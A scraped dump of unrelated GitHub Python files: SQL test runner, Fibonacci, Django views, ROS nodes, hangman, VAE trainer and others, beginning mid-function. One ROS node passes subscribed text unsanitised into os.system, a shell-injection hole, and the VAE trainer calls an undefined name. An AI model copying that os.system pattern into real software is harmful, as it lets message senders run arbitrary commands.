            # 'connect' may be an alias resolved through link_config.
            if params['connect'] in link_config:
                params['connect'] = link_config[params['connect']]
            engine = create_engine(params['connect'])
            maker = sessionmaker(bind=engine)
            session = maker()
            row = None
            trans = session.begin(subtransactions=True)
            try:
                session.execute("SET DATEFORMAT dmy;")
                res = session.execute(text(cmd))
                if res.cursor != None:
                    # Drain every intermediate result set until the final one
                    # labelled 'behave_result' (the updated context document).
                    while 'behave_result' != res.cursor.description[0][0]:
                        names = [c[0] for c in res.cursor.description]
                        store_results = []
                        while 1:
                            row_raw = res.cursor.fetchone()
                            if row_raw is None:
                                break
                            row = dict(zip(names, row_raw))
                            store_results.append(row)
                        self.results.append(store_results)
                        res.cursor.nextset()
                    row = res.cursor.fetchone()
                    res.close()
                session.execute('IF @@TRANCOUNT > 0 BEGIN COMMIT END')
            except:
                # Dump the generated T-SQL for debugging, then re-raise.
                print(cmd)
                raise
            # The procedure or script returned data: mirror the collected
            # result sets into a <results> element of the context document.
            rs_xml = etree.Element("results")
            rs_xml.set('step_type', step_type)
            rs_xml.set('predicate', predicate)
            for res_set in self.results:
                rset_xml = etree.SubElement(rs_xml, "result_set")
                for res_row in res_set:
                    rrow_xml = etree.SubElement(rset_xml, "row")
                    for res_col in res_row:
                        # XML attribute names cannot be empty.
                        res_col4xml = 'empty' if len(res_col) == 0 else res_col
                        rrow_xml.set(res_col4xml, str(res_row[res_col]))
            session.close()
            if row != None:
                if row[0] is None:
                    ctx_out_xml = etree.Element("context")
                else:
                    ctx_out_xml = etree.XML(row[0])
                ctx_out_xml.append(rs_xml)
                return etree.tostring(ctx_out_xml).decode('utf-8')
        return None
return None
| AlexandrMov/sqlbehave | sqlbehave/testmodule.py | testmodule.py | py | 5,971 | python | en | code | 0 | github-code | 36 |
17743117135 | n = int(input())
# Memo table shared across calls: cached[k] == F(k).
cached = {0: 1, 1: 1}
def f(n):
    """Return the n-th Fibonacci number, with F(0) = F(1) = 1.

    Computed iteratively so large n cannot exhaust the interpreter's
    recursion limit (the original recursive version raised RecursionError
    around n ~ 1000).
    """
    if n in cached:
        return cached[n]
    a, b = 1, 1
    for _ in range(n - 1):
        a, b = b, a + b
    cached[n] = b
    return b
print(f(n)) | baocogn/self-learning | big_o_coding/Green_06/day_9_quiz_8_FIBONACCI.py | day_9_quiz_8_FIBONACCI.py | py | 200 | python | en | code | 0 | github-code | 36 |
# Adjacent-pair elimination needs LIFO order (a stack), not alternating scans.
# For each of n input strings, repeatedly cancel equal adjacent characters;
# count how many strings cancel completely.
import sys
input = sys.stdin.readline
n = int(input())
count = 0
for _ in range(n) :
    word = list(map(str, input()))
    word.pop() # drop the trailing '\n' left by readline
    stack = []
    for i in range(len(word)) :
        if len(stack) == 0 :
            stack.append(word[i])
        else :
            if word[i] == stack[-1] :
                # Equal to top of stack: the pair annihilates.
                stack.pop()
            else :
                stack.append(word[i])
    # An empty stack means the whole string cancelled out.
    if len(stack) == 0 :
        count += 1
print(count)
| hwanginbeom/algorithm_study | 1.algorithm_question/3.stack,queue/66.Stack_sejin.py | 66.Stack_sejin.py | py | 520 | python | en | code | 3 | github-code | 36 |
34162683454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import tempfile
from subprocess import PIPE, Popen
import os
import random
import codecs
import math
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from resources import SEMEVAL_SCORER_PATH
logger = logging.getLogger(__name__)
def pretty_pipeline(obj):
    """Flatten a sklearn Pipeline/FeatureUnion tree into plain lists/dicts.

    Useful for inspecting the structure nested inside FeatureUnion steps.

    Args:
        obj: A sklearn Pipeline (or any nested piece of one).

    Returns:
        A flat, printable version of the Pipeline object.
    """
    if isinstance(obj, list):
        return [pretty_pipeline(item) for item in obj]
    if isinstance(obj, FeatureUnion):
        return {'n_jobs': obj.n_jobs,
                'transformer_list': obj.transformer_list,
                'transformer_weights': obj.transformer_weights}
    if isinstance(obj, Pipeline):
        return {'steps': pretty_pipeline(obj.steps)}
    if isinstance(obj, tuple):
        return pretty_pipeline(list(obj))
    return obj
def strings_to_integers(strings, labels):
    """Map each string to its index in ``labels``.

    The same string always maps to the same integer.

    Args:
        strings: An array of strings.
        labels: The reference list of label names.

    Returns:
        A list of integers (indexes into labels).
    """
    return [labels.index(item) for item in strings]
def integers_to_strings(integers, labels):
    """Map each integer back to the label stored at that index.

    Args:
        integers: An array of integers.
        labels: A list of strings; each integer is replaced by the string
            found at that index.

    Returns:
        A list of strings.
    """
    return [labels[index] for index in integers]
def merge_classes(lst, classes, new_class):
    """Replace, in place, every element of ``lst`` found in ``classes``
    with ``new_class``.

    Args:
        lst: The list to rewrite (mutated in place).
        classes: The class names to replace.
        new_class: The replacement class name.

    Returns:
        The same list object, for convenience.
    """
    for idx, item in enumerate(lst):
        if item in classes:
            lst[idx] = new_class
    return lst
def eval_with_semeval_script(test, predicted):
    """Score predictions with the official SemEval-2016 Task 4A Perl scorer.

    Args:
        test: dataset object exposing .labels (index -> label name) and .sid
            (per-example sentence ids).  # assumed from usage; confirm upstream
        predicted: list of predicted label indexes aligned with test.sid.

    Returns:
        The scorer's stdout+stderr followed by the contents of the generated
        '.scored' report, as one string.
    """
    predicted = integers_to_strings(predicted, test.labels)
    # Write "<sid>\t<label>" lines to a temp file the Perl scorer can read.
    ofile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    ret = None
    try:
        for (sid, pred) in zip(test.sid, predicted):
            ofile.write('%s\t%s\n' % (sid, pred))
        ofile.close()
        p = Popen(['_scripts/SemEval2016_task4_test_scorer_subtaskA.pl',
                   ofile.name], stdout=PIPE, stderr=PIPE, cwd=SEMEVAL_SCORER_PATH)
        out, err = p.communicate()
        ret = out + err
        ret = ret.decode()
        # The scorer writes its report next to the input file.
        with open(ofile.name + '.scored', 'r') as ifile:
            for line in ifile:
                ret += line
    finally:
        # Cleanup; note this raises if the scorer never produced '.scored'.
        if not ofile.closed:
            ofile.close()
        os.remove(ofile.name)
        os.remove(ofile.name + '.scored')
    return ret
def assoc_value(lst, value):
    """Return the first entry whose first element equals ``value``, with its
    index.

    Args:
        lst: An associative array/list of (key, ...) entries.
        value: The key to match on.

    Returns:
        A (entry, index) pair, or None when no entry matches.
    """
    return next(((entry, idx) for idx, entry in enumerate(lst)
                 if entry[0] == value), None)
def invert_dict_nonunique(d):
    """Invert a mapping whose values are not unique: each value becomes a key
    mapped to the list of original keys that carried it (insertion order)."""
    inverted = {}
    for key, val in d.items():
        if val not in inverted:
            inverted[val] = []
        inverted[val].append(key)
    return inverted
def split_train_valid(input_path, valid_num=3000):
    """Randomly split ``input_path`` line-wise into '<path>.train' and
    '<path>.valid'.

    valid_num -- number of validation lines; a value in [0, 1] is instead
                 interpreted as a fraction of the total line count.
    """
    train_path = input_path + '.train'
    valid_path = input_path + '.valid'
    nb_line = 0
    with codecs.open(input_path, 'r', 'utf-8') as ifile:
        nb_line = len([line for line in ifile])
    if valid_num <= 1 and valid_num >= 0:
        # Fractional valid_num: convert the ratio to an absolute line count.
        valid_num = math.floor(nb_line * valid_num)
    valid_indexes = random.sample(range(nb_line), valid_num)
    try:
        ifile = codecs.open(input_path, 'r', 'utf-8')
        train_file = codecs.open(train_path, 'w+', 'utf-8')
        valid_file = codecs.open(valid_path, 'w+', 'utf-8')
        idx = 0
        for line in ifile:
            try:
                # EAFP membership test: .index raises ValueError when this
                # line was not sampled for the validation split.
                v_idx = valid_indexes.index(idx)
                valid_file.write(line)
                # Shrink the candidate list as indexes are consumed.
                del valid_indexes[v_idx]
            except ValueError:
                train_file.write(line)
            idx += 1
    finally:
        ifile.close()
        train_file.close()
        valid_file.close()
def opinion_lexicon_to_graph(lexicon):
    """Build an undirected similarity graph from an opinion lexicon.

    ``lexicon`` maps each word to its class. Two words are linked when they
    share a class, so the graph is returned as a dict mapping each word to
    the list of all words of its class (the word itself included).

    Intended for emb.build_custom3.
    """
    graph = {}
    for members in invert_dict_nonunique(lexicon).values():
        for member in members:
            graph[member] = members
    return graph
def split_lexicon_train_test(lexicon, ratio=0.9, shuffle=False):
    """Split each class of the lexicon into train and test parts.

    Args:
        lexicon: Mapping word -> class.
        ratio: Fraction of each class sent to the train lexicon
            (0.9 keeps 90% for training).
        shuffle: Shuffle each class's words before splitting.

    Returns:
        A (train_lexicon, test_lexicon) pair of word -> class dicts.
    """
    train_lexicon = {}
    test_lexicon = {}
    for cls, words in invert_dict_nonunique(lexicon).items():
        if shuffle:
            random.shuffle(words)
        cut = math.floor(len(words) * ratio)
        for word in words[:cut]:
            train_lexicon[word] = cls
        for word in words[cut:]:
            test_lexicon[word] = cls
    return train_lexicon, test_lexicon
def remove_multi_words_in_lexicon(lexicon):
    """Return a copy of the lexicon keeping only single-word entries
    (entries whose key contains no space)."""
    return {word: tag for word, tag in lexicon.items()
            if len(word.split(' ')) == 1}
| daimrod/opinion-sentence-annotator | utils.py | utils.py | py | 7,027 | python | en | code | 0 | github-code | 36 |
21924375123 | #!/usr/bin/env python
import unittest
from network import Arc, Node, Network
class NetworkTestCase(unittest.TestCase):
    """Exercises Node/Arc/Network wiring and per-colour arc flows.

    Uses assertEqual rather than assertTrue(x == y) throughout so that a
    failure reports both operands instead of just "False is not true".
    """

    def test_basic(self):
        node = Node('one')
        nw = Network([node])
        self.assertEqual(nw.find_node('one'), node)
        node = Node(('two', 2))
        nw.add_node(node)
        self.assertEqual(nw.find_node(('two', 2)), node)
        three = Node('three')
        arc = Arc(three, 1)
        nw.find_node('one').add_arc(arc)
        # Nodes reachable through arcs are discoverable even though they
        # were never passed to add_node() explicitly.
        self.assertEqual(nw.find_node('three'), three)

    def test_dont_lose_nodes(self):
        n1 = Node(1)
        n2 = Node(2)
        n1.add_arc(Arc(n2))
        nw = Network([n1])
        self.assertEqual(nw.find_node(2), n2)
        n3 = Node(3)
        n2.add_arc(Arc(n3))
        # Arcs added after network construction are still traversed.
        self.assertEqual(nw.find_node(3), n3)

    def test_has_arc(self):
        n1 = Node(1)
        n2 = Node(2)
        a = Arc(n2)
        n1.add_arc(a)
        self.assertTrue(n1.has_arc(a))

    def test_to_node(self):
        n2 = Node(2)
        a = Arc(n2)
        self.assertEqual(a.to_node(), n2)

    def test_flow(self):
        n2 = Node(1)
        a = Arc(n2)
        # A fresh arc carries zero flow, in aggregate and per colour.
        self.assertEqual(a.total_flow(), 0)
        self.assertEqual(a.flow(), 0)
        a.set_flow(3)
        self.assertEqual(a.flow(), 3)
        a.set_flow(3, 'red')
        self.assertEqual(a.flow('red'), 3)
        # Total flow sums the default and 'red' contributions.
        self.assertEqual(a.total_flow(), 6)


if __name__ == '__main__':
    unittest.main()
| sh4rkfin/misc | python/network_test.py | network_test.py | py | 1,441 | python | en | code | 0 | github-code | 36 |
35742603936 | #!/usr/bin/env python3
import jetson.inference
import jetson.utils
import rospy
import os
import numpy as np
import cv2
import ctypes
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
class semanticSegmentation:
    """ROS node helper: runs jetson-inference semantic segmentation on
    incoming camera frames and republishes the overlay and mask images."""
    def __init__(self, topics_to, network, labels_file, camera_info):
        # Load the class-name list, one label per line.
        with open(labels_file) as labels:
            lines = labels.readlines()
            self._object_class = [label.strip() for label in lines]
        # Camera dimensions taken from the CameraInfo message.
        self._CAMERA_WIDTH = camera_info.width
        self._CAMERA_HEIGHT = camera_info.height
        self._FILTER_MODE = "point"
        self._IGNORE_CLASS = "void"
        # Overlay blending alpha (0-255).
        self._ALPHA = 175.0
        # Initialize the segmentation network.
        self._net = jetson.inference.segNet(network)
        # Set the alpha blending value.
        self._net.SetOverlayAlpha(self._ALPHA)
        # Allocate CUDA-mapped output buffers for the overlay & mask
        # (RGBA float32, hence width * height * 4 * sizeof(float)).
        self._img_overlay = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
        self._img_mask = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
        self._bridge = CvBridge()
        # Publishers for the segmentation overlay and mask frames.
        self._overlay_publisher = rospy.Publisher(topics_to['overlay'], Image, queue_size=1)
        self._mask_publisher = rospy.Publisher(topics_to['mask'], Image, queue_size=1)
    def detect(self, data):
        """Image-topic callback: segment one frame and publish the results."""
        # Receive frame from the camera topic.
        try:
            frame = self._bridge.imgmsg_to_cv2(data, "rgb8")
        except CvBridgeError as e:
            print(e)
        # Convert frame to RGBA, then to CUDA memory for the network.
        rgba_frame = cv2.cvtColor(frame, cv2.COLOR_RGB2RGBA)
        cuda_mem = jetson.utils.cudaFromNumpy(rgba_frame)
        # Run the segmentation network.
        self._net.Process(cuda_mem, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._IGNORE_CLASS)
        # Generate the overlay and class-colour mask into the CUDA buffers.
        self._net.Overlay(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
        self._net.Mask(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
        # Copy the CUDA buffers back to numpy arrays.
        overlay_frame = jetson.utils.cudaToNumpy(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
        mask_frame = jetson.utils.cudaToNumpy(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
        # Convert RGBA frames to RGB uint8.
        overlay_frame = cv2.cvtColor(overlay_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
        mask_frame = cv2.cvtColor(mask_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
        # Binary mask isolating pixels whose class colour is (220, 20, 60).
        # NOTE(review): that looks like the Cityscapes 'person' colour, so
        # this appears to publish a person-only mask -- confirm intent.
        test_frame = np.zeros_like(mask_frame)
        test_frame[np.where((mask_frame==[220, 20, 60]).all(axis=2))] = (255, 255, 255)
        # Publish the overlay and the binary mask.
        try:
            self._overlay_publisher.publish(self._bridge.cv2_to_imgmsg(overlay_frame, encoding="rgb8"))
            self._mask_publisher.publish(self._bridge.cv2_to_imgmsg(test_frame, encoding="rgb8"))
            rospy.loginfo("Published semantic segmentation frame")
        except CvBridgeError as e:
            print(e)
def main():
    """Start the semantic_segmentation node: wire the camera topic to the
    segmentation callback and spin until shutdown."""
    rospy.init_node('semantic_segmentation')
    NETWORK = rospy.get_param('network', "fcn-resnet18-cityscapes-512x256")
    LABELS_FILE = rospy.get_param('labels_file', '/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation/networks/FCN-ResNet18-Cityscapes-512x256/classes.txt')
    # NOTE(review): the variable says LEFT but the topic is the RIGHT
    # camera's info -- confirm which camera's intrinsics are intended.
    LEFT_CAMERA_INFO = rospy.wait_for_message('/prius/right_camera/camera_info', CameraInfo)
    os.chdir('/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation')
    TOPIC_FROM = "/prius/left_camera/image_raw"
    TOPICS_TO = {'overlay':"/semantic_segmentation/image_overlay",
                 'mask':"/semantic_segmentation/image_mask"}
    semantic_segmentation = semanticSegmentation(TOPICS_TO, NETWORK, LABELS_FILE, LEFT_CAMERA_INFO)
    # Large buff_size so full frames are not split across reads.
    rawframe_subscriber = rospy.Subscriber(TOPIC_FROM, Image, semantic_segmentation.detect, buff_size=2**24, queue_size=2)
    rate = rospy.Rate(30)
    try:
        # NOTE(review): rospy.spin() blocks, so the surrounding while loop
        # only ever runs one iteration -- presumably harmless; confirm.
        while not rospy.is_shutdown():
            rate.sleep()
            rospy.spin()
    except rospy.ROSInterruptException:
        rospy.loginfo("Shutting down")
if __name__ == "__main__":
    main()
| ZiadGhanem/Adaptive-Cruise-Control-Application | graduation_project_pkgs/graduation_project_simulation/scripts/semantic_segmentation/semantic_segmentation.py | semantic_segmentation.py | py | 4,078 | python | en | code | 0 | github-code | 36 |
26946898269 | import numpy as np
import rogues
def dramadah(n, k=1):
    """
    dramadah: an n-by-n (0,1) matrix whose inverse has large integer entries.

    An anti-Hadamard matrix A is a matrix with elements 0 or 1 for
    which mu(A) := norm(inv(A), 'fro') is maximal.

    a = dramadah(n, k) is an n-by-n (0,1) matrix for which mu(a) is
    relatively large, although not necessarily maximal.

    Available types (the default is k = 1):

    k = 1: A is Toeplitz, with abs(det(A)) = 1, and mu(A) > c(1.75)^n,
           where c is a constant. The inverse has integer entries.
    k = 2: A is upper triangular and Toeplitz; inverse has integer entries.
    k = 3: A has maximal determinant among (0,1) lower Hessenberg
           matrices: det(A) = the n'th Fibonacci number. A is Toeplitz.
           The eigenvalues have an interesting distribution in the complex
           plane.

    NOTE(review): any k outside {1, 2, 3} skips every branch and raises
    UnboundLocalError at ``return a``.

    References:
    R.L. Graham and N.J.A. Sloane, Anti-Hadamard matrices,
       Linear Algebra and Appl., 62 (1984), pp. 113-137.
    L. Ching, The maximum determinant of an nxn lower Hessenberg
       (0,1) matrix, Linear Algebra and Appl., 183 (1993), pp. 147-153.
    """
    if k == 1:
        # Toeplitz: first column is all ones with zeros punched in a
        # period-4 pattern; first row is [1, 1, 0, 1, 0, 0, ...].
        c = np.ones(n)
        for i in range(1, n, 4):
            m = min(1, n - i)
            c[i:i + m + 1] = 0
        r = np.zeros(n)
        r[0:4] = np.array([1, 1, 0, 1])
        if n < 4:
            # Truncate the row pattern for tiny matrices.
            r = r[0:n]
        a = rogues.toeplitz(c, r)
    elif k == 2:
        # Upper triangular and Toeplitz: row alternates 1,1,0,1,0,1,...
        c = np.zeros(n)
        c[0] = 1
        r = np.ones(n)
        r[2::2] = 0
        a = rogues.toeplitz(c, r)
    elif k == 3:
        # Lower Hessenberg: column alternates 1,0,1,0,...; row is [1,1,0,...].
        c = np.ones(n)
        c[1::2] = 0
        a = rogues.toeplitz(c, np.hstack((np.array([1, 1]), np.zeros(n - 2))))
    return a
| macd/rogues | rogues/matrices/dramadah.py | dramadah.py | py | 1,919 | python | en | code | 16 | github-code | 36 |
35860493029 | import allure
from integration_template.forms.main_form import MainForm, TypeOfTesting
from tests.test_base import TestBase
class TestMainForm(TestBase):
    """UI tests for the main page: navigation, and testing-type buttons."""
    # NOTE(review): instantiated at import time, before any browser setup --
    # presumably MainForm() only builds locators lazily; confirm.
    main_form = MainForm()
    def setup(self):
        # Runs before each test: open the app and verify the page rendered.
        with allure.step("Go to main page"):
            self.go_to_start_page()
        with allure.step("Main page is displayed"):
            assert self.main_form.state.is_displayed()
            assert self.main_form.label_nav_header.state.wait_for_displayed()
    def test_main_page(self):
        # The nav bar is expected to expose exactly four items.
        with allure.step("Check Navigation menu items"):
            assert len(self.main_form.nav_menu_buttons()) == 4
        with allure.step("Check base elements"):
            assert self.main_form.contact_us.state.is_displayed()
            # Every testing-type entry must have a visible button.
            for type_of_testing in TypeOfTesting:
                assert self.main_form.type_of_testing_button(type_of_testing).state.is_displayed()
| Polmik/py-selenium-auto-template | tests/main_form/test_main_form.py | test_main_form.py | py | 889 | python | en | code | 0 | github-code | 36 |
31868481915 | import CRUD
# Console menu for a simple task CRUD application backed by the CRUD module.
while True:
    # Reload the persisted task list at the top of every menu cycle.
    ListaTareas = CRUD.Leer()
    print("\n---------------------------------------")
    print("Aplicación CRUD")
    print("1. Adicionar Tarea")
    print("2. Consultar Tareas")
    print("3. Actualizar Tarea")
    print("4. Eliminar Tarea")
    print("5. Salir")
    opcion = input("\nIngrese una opción: ")
    print("---------------------------------------\n")
    if opcion == "1":
        # Create: gather the fields and store a new task.
        nombre = input("Ingrese el nombre de la tarea >> ")
        descrp = input("Describa la tarea >> ")
        estado = input("Estado actual de la tarea >> ")
        try:
            tiempo = float(input("Ingrese el tiempo destinado para la tarea (minutos) >> "))
        except:
            print("Error. Tiempo debe ser un número.")
            continue
        CRUD.Crear(
            nombre,
            {"Descripcion":descrp, "Estado Actual":estado, "Tiempo":tiempo}
        )
    elif opcion == "2":
        # Read: list every stored task with its fields.
        print("Lista de tareas guardadas:\n")
        for i, Tarea in enumerate(ListaTareas):
            print(f"{i+1}: {Tarea}:\n")
            Tarea = ListaTareas[Tarea]
            print(f"Descripción: {Tarea['Descripcion']}")
            print(f"Estado Actual: {Tarea['Estado Actual']}")
            print(f"Tiempo: {Tarea['Tiempo']}")
    elif opcion == "3":
        # Update: overwrite an existing task's fields.
        # NOTE(review): reuses CRUD.Crear for updates -- presumably Crear
        # overwrites existing keys; confirm in the CRUD module.
        nombre = input("Ingrese el nombre de la tarea >> ")
        if nombre not in ListaTareas: print("La tarea no existe.")
        else:
            descrp = input("Describa la tarea >> ")
            estado = input("Estado actual de la tarea >> ")
            try:
                tiempo = float(input("Ingrese el tiempo destinado para la tarea (minutos) >> "))
            except:
                print("Error. Tiempo debe ser un número.")
                continue
            CRUD.Crear(
                nombre,
                {"Descripcion":descrp, "Estado Actual":estado, "Tiempo":tiempo}
            )
    elif opcion == "4":
        # Delete: remove the task if it exists.
        nombre = input("Ingrese el nombre de la tarea >> ")
        if nombre not in ListaTareas: print("La tarea no existe.")
        else:
            CRUD.Eliminar(nombre)
            print("Se ha eliminado la tarea.")
    elif opcion == "5":
        print("\nGracias por utilizar este servicio 😁\n")
        break
    else:
        print("\nOpción no disponible. Inténtelo de nuevo")
6254269803 | from __future__ import unicode_literals
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post, Tag
from .forms import PostAddForm
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def delete(request, post_id):
    """Delete the post identified by post_id, then return to the index."""
    get_object_or_404(Post, id=post_id).delete()
    return redirect('blog_app:index')
@login_required
def edit(request, post_id):
    """Edit an existing post: GET shows a pre-filled form, a valid POST saves
    and redirects to the detail page."""
    post = get_object_or_404(Post, id=post_id)
    if request.method != "POST":
        # Pre-populate the form with the post's current content.
        blank_form = PostAddForm(instance=post)
        return render(request, 'blog_app/edit.html', {'form': blank_form, 'post': post})
    bound_form = PostAddForm(request.POST, request.FILES, instance=post)
    if not bound_form.is_valid():
        # Re-display the bound form so validation errors are shown.
        return render(request, 'blog_app/edit.html', {'form': bound_form, 'post': post})
    bound_form.save()
    return redirect('blog_app:detail', post_id=post.id)
@login_required
def add(request):
    """Create a new post owned by the logged-in user."""
    if request.method != "POST":
        # Plain visit: show an empty form.
        return render(request, 'blog_app/add.html', {'form': PostAddForm()})
    form = PostAddForm(request.POST, request.FILES)
    if not form.is_valid():
        # Show the bound form again with its validation errors.
        return render(request, 'blog_app/add.html', {'form': form})
    # Attach the author before the real save (commit=False defers the write).
    new_post = form.save(commit=False)
    new_post.user = request.user
    new_post.save()
    return redirect('blog_app:index')
def detail(request, post_id):
    """Display a single post, 404ing when the id is unknown."""
    return render(request, 'blog_app/detail.html',
                  {'post': get_object_or_404(Post, id=post_id)})
def index(request):
    """List every post, newest first."""
    latest_first = Post.objects.all().order_by('-created_at')
    return render(request, 'blog_app/index.html', {'posts': latest_first})
8126703324 | import random
# Pick a random word from the dictionary file (one word per line).
mots = []
with open("mots.txt") as fl:
    for l in fl:
        mots.append(l.rstrip("\n"))
mot = random.choice(mots)
# Key game state: guessed letters, wrong-guess count, win flag, and the
# hangman body parts revealed one per wrong guess.
lettres = []
faux = 0
trouve = False
corps_plein = ["O", "/", "|", "\\", "/", "\\"]
corps = [" ", " ", " ", " ", " ", " "]
while not trouve:
    trouve = True
    # Draw the gallows with the body parts revealed so far.
    print(" +---+")
    print(" |   |")
    print(" |   {}".format(corps[0]))
    print(" |  {}{}{}".format(corps[1], corps[2], corps[3]))
    print(" |  {} {}".format(corps[4], corps[5]))
    print("_|_")
    print("| |")
    # Show the word, revealing guessed letters; any blank means unsolved.
    for l in mot:
        if l in lettres:
            print(l, end=" ")
        else:
            trouve = False
            print("_", end=" ")
    print()
    print("Lettres utilisées - ", end="")
    for l in lettres:
        print(l, end=" | ")
    print()
    # Six wrong guesses (body indexes 0-5) lose the game.
    if faux > 5:
        print("Oh non :( Tu as perdu...")
        print("Le mot était : {}".format(mot))
        break
    if trouve:
        print("Bravo ! Tu viens de remporter La partie !")
        break
    lettre = input("Entez une lettre: ")
    lettres.append(lettre)
    # Wrong guess: reveal the next body part.
    if lettre not in mot:
        corps[faux] = corps_plein[faux]
        faux += 1
41721739407 | # -*- coding:UTF-8 -*-
import numpy as np
import xlrd as xlrd
from scipy.stats import norm
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import importlib
# Arg 1: Excel file path; arg 2: sheet index to plot; args 3-5: x-label,
# y-label and title text; arg 6: column index. The function plots one chosen
# column of one sheet of the file at the given path.
class Make_figure:
    """Plot one column of one sheet of an Excel workbook as a dashed line."""

    @staticmethod
    def result_pic(address, Excel_Choice, xlabel, ylabel, title, FormColumns):
        """Render column ``FormColumns`` of sheet ``Excel_Choice`` of the
        workbook at ``address``.

        address -- path to the .xls/.xlsx file
        Excel_Choice -- sheet index, must be one of 0..3
        xlabel, ylabel, title -- chart text
        FormColumns -- zero-based column index to plot
        """
        # Configure matplotlib for CJK text (SimHei) and correct minus signs.
        # (The original importlib.reload(sys) was a Python-2 encoding relic
        # and has been dropped.)
        matplotlib.rcParams['font.sans-serif'] = ['SimHei']
        plt.rcParams['font.sans-serif'] = ['SimHei']
        plt.rcParams['axes.unicode_minus'] = False
        # Reject out-of-range sheet indexes up front; the original fell
        # through with `data` unbound and crashed with a NameError.
        if Excel_Choice not in (0, 1, 2, 3):
            print('输入有误!!!')
            return
        data = pd.read_excel(address, Excel_Choice)
        # x axis: row index; y axis: the chosen column's values.
        x = range(0, data.iloc[:, FormColumns].count(), 1)
        y = data.iloc[:, FormColumns]
        plt.plot(x, y, 'b--')
        # Legend label: "Ethereum block transaction count".
        s1 = "以太坊区块交易数"
        plt.xlabel(xlabel)
        plt.ylabel(ylabel)
        plt.title(title)
        plt.legend([s1], loc="upper left")
        plt.show()
| 357734432/Supervised-Blockchain-Simulator | Data_Output/Make_figure.py | Make_figure.py | py | 1,617 | python | en | code | 0 | github-code | 36 |
42768275908 | # Module 5
# Programming Assignment 6
# Prob-3.py
# Robert Ballenger
from graphics import *
def main():
    """Draw a five-ring archery target (white outer ring to yellow bullseye)."""
    win = GraphWin(title="Shooty Shooty Bow Target", height=400, width=400)
    center = Point(200, 200)
    # Concentric rings, drawn largest-first so each smaller one sits on top.
    rings = ((160, "white"), (120, "black"), (90, "blue"), (60, "red"), (30, "yellow"))
    for radius, color in rings:
        ring = Circle(center, radius)
        ring.setFill(color)
        ring.draw(win)
    # Keep the window open until the user clicks, with an instruction label.
    Text(Point(200, 385), "Click again to quit.").draw(win)
    win.getMouse()

main()
| CTEC-121-Spring-2020/mod-4-programming-assignment-Rmballenger | Prob-3/Prob-3.py | Prob-3.py | py | 1,336 | python | en | code | 0 | github-code | 36 |
21577757864 | from imath.Trainer import Trainer
import torch
import imath as pt
import os
import torch.nn as nn
import numpy as np
class VAETrainer(Trainer):
    """Trainer for a variational autoencoder built from the model's
    ``Distribute`` (encoder) and ``Decoder`` sub-networks.
    """
    def __init__(self, optim, lant_dim, criterion, **kwargs):
        # optim: optimizer passed to self.update(); lant_dim: size of the
        # latent noise vector; criterion: reconstruction loss.
        super(VAETrainer, self).__init__(**kwargs)
        self.lant_dim = lant_dim
        self.Distribute = self.model.Distribute
        self.Decoder = self.model.Decoder
        self.optim = optim
        self.criterion = criterion
    def forward(self, data, forward_mode, **kwargs):
        # One step: encode, reparameterize, decode, then optimizer update.
        img = data['x']
        # print('??')
        batch = img.size(0)
        distrib = self.Distribute(img)
        # Channels 0 and 1 hold the mean and log-variance of the latent
        # distribution. NOTE(review): assumes the encoder output is laid out
        # (batch, 2, ...) -- confirm against the model definition.
        mul = distrib[:, 0:1]
        log_sig = distrib[:, 1:2]
        epi = torch.randn(batch, self.lant_dim).to(img.device)
        # print(mul.shape, log_sig.shape, epi.shape)
        # Reparameterization trick: z = mu + eps * sigma.
        z = mul + epi * torch.exp(log_sig / 2.)
        # NOTE(review): hard-coded latent shape (6, 7, 6) must match
        # lant_dim (= 252) -- TODO confirm.
        z = z.view((batch, 6, 7, 6))
        reconstrust = self.Decoder(z)
        loss = self.criterion(img, reconstrust) * 10
        self.update(self.optim, loss)
        if forward_mode == 'train':
            return {'loss': loss.item()}
        else:
            return {'rec': reconstrust}
    def evaluate(self, batch_size, device, **kwargs):
        # Displays the first two reconstructions of the second batch.
        # loss = []
        for n, data in enumerate(self._evaluate(batch_size, device, **kwargs)):
            # loss.append(data['loss'])
            rec = data['rec']
            # print(rec.shape)
            if n == 1:
                for r in rec[:2]:
                    # NOTE(review): `im` is not defined in this module (the
                    # import is `import imath as pt`) -- this line raises
                    # NameError when reached; likely meant `pt` or a plotting
                    # library. Confirm intended name.
                    im.imshow(r.squeeze())
                    # im.imsave('rec.png', r.squeeze()*256)
        # loss = np.mean(np.array(loss))
        return 1.
74850579945 | import sys
import time
import rospy
from array import array
from std_msgs.msg import String
import os
voicePublisher = rospy.Publisher('voiceOutput', String, queue_size=10)
def publishMessage(message):
voicePublisher.publish(message)
def listenNode(data):
print("callback " + data.data)
if data.data:
print("message receiveid")
os.system("espeak " + '"' + data.data + '"')
publishMessage("")
def listener():
rospy.init_node('listener', anonymous=True)
voiceSubscriber = rospy.Subscriber('voiceOutput', String, listenNode)
while not rospy.is_shutdown():
print("listening")
rospy.spin()
if __name__ == '__main__':
listener()
| LuizHenriqueP/ReadyFramework | readyVoiceOutput.py | readyVoiceOutput.py | py | 708 | python | en | code | 0 | github-code | 36 |
20406219922 | import os
import numpy as np
import tensorflow as tf
ROOT_DIR = os.path.abspath(__file__ + "/../../")
class BaseSpinFoam:
def __init__(self, spin_j, n_boundary_intertwiners, n_vertices):
